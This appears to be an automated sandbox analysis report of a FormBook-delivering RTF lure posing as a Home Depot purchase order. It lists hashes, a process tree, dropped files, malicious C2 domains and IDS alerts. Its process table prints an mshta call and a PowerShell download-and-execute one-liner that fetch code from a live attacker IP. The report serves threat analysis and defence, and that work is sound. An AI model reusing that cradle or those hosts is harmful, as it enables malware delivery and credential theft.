| Field | Value |
|---|---|
| File name | HomeDepot-PO18092019.doc |
| Full analysis | https://app.any.run/tasks/ef4eeb28-e32d-4285-975b-76da06e7dc29 |
| Verdict | Malicious activity |
| Threats | FormBook is a data stealer distributed as malware-as-a-service (MaaS). FormBook differs from much competing malware in its extreme ease of use, which lets even inexperienced threat actors deploy the FormBook virus. |
| Analysis date | September 18, 2019, 18:06:37 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | text/rtf |
| File info | Rich Text Format data, version 1, unknown character set |
| MD5 | B7B359E2EE8CDD0509BAB4F5CF69DA8A |
| SHA1 | 9FEC5B1B8385B4A8A2EC8647D9C4AA96000915AD |
| SHA256 | 55D3B652EC89681F6A131E92CC703BCAE15FB8DDC42179FF88D130AE19B0B6D4 |
| SSDEEP | 192:VkE6B5aToSwrPowhacsLbMBOX7ojJnOi5VmxbWYYY5:VkrB5aToSwrPowkcIbMBOXti5Vs |
| Extension | Identified type |
|---|---|
| .rtf | Rich Text Format (100) |

| Document property | Value |
|---|---|
| InternalVersionNumber | 95 |
| CharactersWithSpaces | 23 |
| Characters | 21 |
| Words | 3 |
| Pages | 1 |
| TotalEditTime | 1 minute |
| RevisionNumber | 2 |
| ModifyDate | 2019:09:17 19:46:00 |
| CreateDate | 2019:09:17 19:43:00 |
| LastModifiedBy | FireSecIT |
| Author | FireSecIT |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 2972 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\HomeDepot-PO18092019.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 3616 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 |
| 2304 | mShTA http://185.161.209.47:1010/hta &AAAAAAC | C:\Windows\system32\mShTA.exe | — | EQNEDT32.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
| 3164 | powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://185.161.209.47:1010/get')); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3136 | "C:\Users\Public\bvsz.exe" | C:\Users\Public\bvsz.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8D70.tmp.cvr | — | — | — |
| 3164 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4EOQ9NFDQ5BLKTPLNF9R.temp | — | — | — |
| 2972 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 87BD855580060A76C9E649C36C3F0C54 | 9481A0A433239C05807E547AE06FC7638556ECF6765F72EC9C99739F9AB3D3F8 |
| 3164 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 0F2CAD9746414ABA31294C3B560FCFD5 | 19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 |
| 2304 | mShTA.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\hta[1] | html | 0642F562E9C834CD378FED2A7D8988B5 | D2EC46D09740C9085CEE72B1CA156562431A48646AD72040C23F3CCB32CD71B1 |
| 3136 | bvsz.exe | C:\Users\admin\AppData\Roaming\channelName\missingtrackvolume\struct\lcdefinename.png | image | 628C9B04F5D582F429409915D36663CD | 2B9A26AE4D36E485BA087B6667E690250D53F96528DFCC1B91E7356200679482 |
| 3136 | bvsz.exe | C:\Users\admin\AppData\Roaming\channelName\missingtrackvolume\struct\vsmsvr.exe | xml | 7B3340410E29B9286775BFE173EEF518 | 8248A652CA2407BE9CC59C69247EBE7EC036982CAC90A66D67F1578F4C4659E3 |
| 3136 | bvsz.exe | C:\Users\admin\AppData\Local\Temp\nswE0FF.tmp | — | — | — |
| 3164 | powershell.exe | C:\Users\Public\bvsz.exe | executable | 3E9D049D52455375BB37DCAB1F9F23EE | FD4F5FA07C2DB69AD0DCA2B5D897AC1105173D42FC2C53F253B5A0AD4BE57384 |
| 3136 | bvsz.exe | C:\Users\admin\AppData\Roaming\channelName\missingtrackvolume\struct\insertcellsbar.xml | xml | D593FD2B7DF6991C460960494BF118B6 | 18762FA4013146695DD715C3E729D613F2C5818DBB9E5BF1E4D42C9ECD8AB54A |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| — | — | GET | 301 | 185.230.62.177:80 | http://www.iris2skin.com/pm/?Ul9L=Tl7e38PleDU8QHQ3sgW03tw9+vSTaX5aq4nzu8UHFDIO/Wvx/8sKtgEjO2S3NahKlhiU8Q==&5j=zl3D | unknown | — | — | malicious |
| — | — | GET | — | 91.195.240.94:80 | http://www.constructorarabguar.com/pm/?Ul9L=UNIa0Th48awdAW3TSGSxSSGqL46Z+e1F2BI+/U+iNAM7uRQAqZ7PfkaLzWpa7AvR8c6+rg==&5j=zl3D&sql=1 | DE | — | — | malicious |
| 2304 | mShTA.exe | GET | 200 | 185.161.209.47:1010 | http://185.161.209.47:1010/hta | NL | html | 2.44 Kb | malicious |
| 3164 | powershell.exe | GET | 200 | 185.161.209.47:1010 | http://185.161.209.47:1010/get | NL | text | 468 Kb | malicious |
| — | — | POST | — | 91.195.240.94:80 | http://www.constructorarabguar.com/pm/ | DE | — | — | malicious |
| — | — | POST | — | 91.195.240.94:80 | http://www.constructorarabguar.com/pm/ | DE | — | — | malicious |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2304 | mShTA.exe | 185.161.209.47:1010 | — | Serverius Holding B.V. | NL | malicious |
| — | — | 91.195.240.94:80 | www.constructorarabguar.com | SEDO GmbH | DE | malicious |
| — | — | 185.230.62.177:80 | www.iris2skin.com | — | — | malicious |
| 3164 | powershell.exe | 185.161.209.47:1010 | — | Serverius Holding B.V. | NL | malicious |
| Domain | IP | Reputation |
|---|---|---|
| www.iris2skin.com | — | malicious |
| www.news3049.reisen | — | unknown |
| www.constructorarabguar.com | — | malicious |
| PID | Process | Class | Message |
|---|---|---|---|
| 2304 | mShTA.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
| 3164 | powershell.exe | A Network Trojan was detected | ET TROJAN Windows executable base64 encoded |
| 3164 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable base64 Payload |
| — | — | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
| — | — | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
| — | — | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
| — | — | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |
| — | — | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
| — | — | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |